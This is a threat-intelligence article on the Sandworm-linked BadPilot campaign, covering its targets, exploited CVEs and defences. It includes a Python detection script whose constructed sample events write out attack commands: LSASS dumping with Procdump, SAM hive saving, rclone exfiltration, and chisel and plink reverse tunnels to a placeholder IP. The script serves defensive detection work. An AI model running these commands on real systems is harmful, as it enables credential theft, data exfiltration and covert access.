BadPilot Cyberattacks Help Hackers Target Networks

BadPilot cyberattacks have been fueling Russian hacker operations for years. The campaign is run by a subgroup of the Russian state-sponsored group APT44, also known as Sandworm, which has been carrying out widespread network intrusions. According to a recent report, this subgroup focuses on breaching critical infrastructure, including the energy, telecommunications, and defense sectors.

The campaign has been active since at least 2021. Its primary goal is to gain initial access to target networks and establish long-term persistence, after which the access is handed to other APT44 subgroups for follow-on operations, including destructive attacks.

Expanding Target Regions

Initially, the BadPilot campaign focused on Ukraine, Europe, Central and South Asia, and the Middle East. After Russia's invasion of Ukraine in 2022, the attacks intensified, with the hackers specifically targeting government agencies, military networks, and logistics operations.

In 2023, the group broadened its targeting to include the United States alongside Europe and the Middle East. In 2024, it increased its focus on the U.S., the U.K., Canada, and Australia. The campaign has already compromised organizations in each of these regions.

Hacking Techniques and Exploited Vulnerabilities

The APT44 subgroup uses several methods to breach networks: exploiting known vulnerabilities in internet-facing software, stealing credentials, and carrying out supply chain attacks. Some of the key vulnerabilities it has targeted include:

  • Microsoft Exchange (CVE-2021-34473)
  • Zimbra Collaboration Suite (CVE-2022-41352)
  • JetBrains TeamCity (CVE-2023-42793)
  • Microsoft Outlook (CVE-2023-23397)
  • ConnectWise ScreenConnect (CVE-2024-1709)

Once inside a system, the hackers install backdoors, deploy web shells, and use legitimate remote monitoring and management tools such as Atera Agent and Splashtop, which blend in with normal IT administration and help them evade detection. They steal credentials by dumping LSASS memory with Procdump or by saving credential-bearing registry hives to disk, exfiltrate data using Rclone, and tunnel traffic through Chisel and Plink.
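The tradecraft in the paragraph above is visible in process-creation telemetry, and that is where a defender would look for it. The following is an added example of detection logic (not code from the original article or from any vendor report) run over constructed sample events. The event fields loosely follow Sysmon Event ID 1, the host names, paths, and command lines are made up, the approved-RMM allowlist is a hypothetical organization policy, and the MITRE ATT&CK technique IDs are my own mapping rather than anything the article states.

```python
"""Detection rules for BadPilot-style post-exploitation activity.

Added example with constructed sample data; the Sysmon-like field names
(image, original_file_name, cmdline) and the APPROVED_RMM policy are assumptions.
"""
import ntpath
import re
from typing import Dict, List

Event = Dict[str, str]

# Constructed sample telemetry (not real logs). One benign line per tool family
# is included so the rules can be checked for false positives as well as hits.
SAMPLE_EVENTS: List[Event] = [
    {"host": "ws01", "image": r"C:\Windows\System32\notepad.exe",
     "original_file_name": "NOTEPAD.EXE", "cmdline": "notepad.exe report.txt"},
    {"host": "ws01", "image": r"C:\Tools\procdump64.exe",
     "original_file_name": "procdump",
     "cmdline": "procdump64.exe -accepteula -ma lsass.exe C:\\Temp\\l.dmp"},
    {"host": "srv02", "image": r"C:\Windows\System32\reg.exe",
     "original_file_name": "reg.exe", "cmdline": r"reg save hklm\sam C:\Temp\sam.hiv"},
    {"host": "srv02", "image": r"C:\Windows\System32\reg.exe",
     "original_file_name": "reg.exe", "cmdline": r"reg query HKLM\Software\Policies"},
    # Renamed rclone: the on-disk name looks innocuous, the PE's OriginalFileName does not.
    {"host": "srv02", "image": r"C:\Users\Public\svchost.exe",
     "original_file_name": "rclone.exe", "cmdline": "svchost.exe copy C:\\Share remote:bkt -P"},
    {"host": "srv03", "image": r"C:\ProgramData\chisel.exe",
     "original_file_name": "chisel.exe", "cmdline": "chisel.exe client 203.0.113.10:8080 R:socks"},
    {"host": "srv03", "image": r"C:\Windows\Temp\plink.exe",
     "original_file_name": "Plink", "cmdline": "plink.exe -N -R 3389:127.0.0.1:3389 u@203.0.113.10"},
    {"host": "srv04", "image": r"C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe",
     "original_file_name": "AteraAgent.exe", "cmdline": "AteraAgent.exe"},
    {"host": "helpdesk01",
     "image": r"C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRServer.exe",
     "original_file_name": "SRServer.exe", "cmdline": "SRServer.exe"},
]

# Hypothetical policy: only the help desk host is sanctioned to run Splashtop;
# any other RMM tool, on any host, is unexpected and should alert.
APPROVED_RMM = {"helpdesk01": {"splashtop"}}
RMM_MARKERS = ("atera", "splashtop")


def _names(e: Event) -> str:
    """Lower-cased image basename plus OriginalFileName, so renamed binaries still match."""
    return f"{ntpath.basename(e['image'])} {e.get('original_file_name', '')}".lower()


def _cmd(e: Event) -> str:
    return e["cmdline"].lower()


def lsass_dump(e: Event) -> bool:
    return "procdump" in _names(e) and "lsass" in _cmd(e)


def hive_dump(e: Event) -> bool:
    # reg.exe saving the SAM/SECURITY/SYSTEM hives; plain "reg query" must not fire.
    return "reg.exe" in _names(e) and re.search(
        r"\bsave\b.*\b(hklm\\)?(sam|security|system)\b", _cmd(e)) is not None


def rclone_exfil(e: Event) -> bool:
    return "rclone" in _names(e)


def tunnel_tool(e: Event) -> bool:
    return any(t in _names(e) for t in ("chisel", "plink"))


def unapproved_rmm(e: Event) -> bool:
    seen = [m for m in RMM_MARKERS if m in _names(e) or m in e["image"].lower()]
    return any(m not in APPROVED_RMM.get(e["host"], set()) for m in seen)


RULES = [
    ("credential_dump_lsass_procdump", "T1003.001", lsass_dump),
    ("credential_dump_registry_hives", "T1003.002", hive_dump),
    ("exfil_rclone", "T1567", rclone_exfil),
    ("tunneling_chisel_plink", "T1572", tunnel_tool),
    ("unapproved_remote_access_tool", "T1219", unapproved_rmm),
]


def evaluate(events: List[Event]) -> List[Dict[str, str]]:
    """Run every rule over every event and return one alert per (rule, event) hit."""
    alerts = []
    for e in events:
        for name, technique, pred in RULES:
            if pred(e):
                alerts.append({"rule": name, "technique": technique,
                               "host": e["host"], "cmdline": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a['technique']}] {a['rule']:<34} {a['host']:<11} {a['cmdline']}")
```

Two design points matter in practice. Matching on the PE's OriginalFileName as well as the on-disk name catches the common trick of renaming rclone or plink to something benign, and the RMM rule is an allowlist rather than a blocklist, so a sanctioned tool on a sanctioned host stays quiet while the same tool appearing elsewhere alerts.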

In 2024, researchers uncovered a new evasion technique: the hackers began routing command-and-control traffic through the Tor network, which makes the activity harder to attribute and to block by IP reputation alone. It does not make it invisible; Tor connections from servers that have no business using Tor are themselves a strong signal, and outbound connections to known Tor entry nodes can be monitored or blocked.

How to Protect Against BadPilot Attacks

Organizations can defend against BadPilot cyberattacks by promptly patching the internet-facing products the group is known to exploit, such as Exchange, Zimbra, TeamCity, Outlook, and ScreenConnect. Enforcing multi-factor authentication (MFA), preferably phishing-resistant, limits what a stolen password is worth. Security teams should also monitor for unusual network activity, including credential-dumping behavior, tunneling tools, and unexpected Tor connections, and should allowlist approved remote access tools so that unauthorized ones such as an unsanctioned Atera or Splashtop install are blocked or alerted on. Limiting administrative privileges and enforcing strict access controls reduces the damage an intruder can do once inside.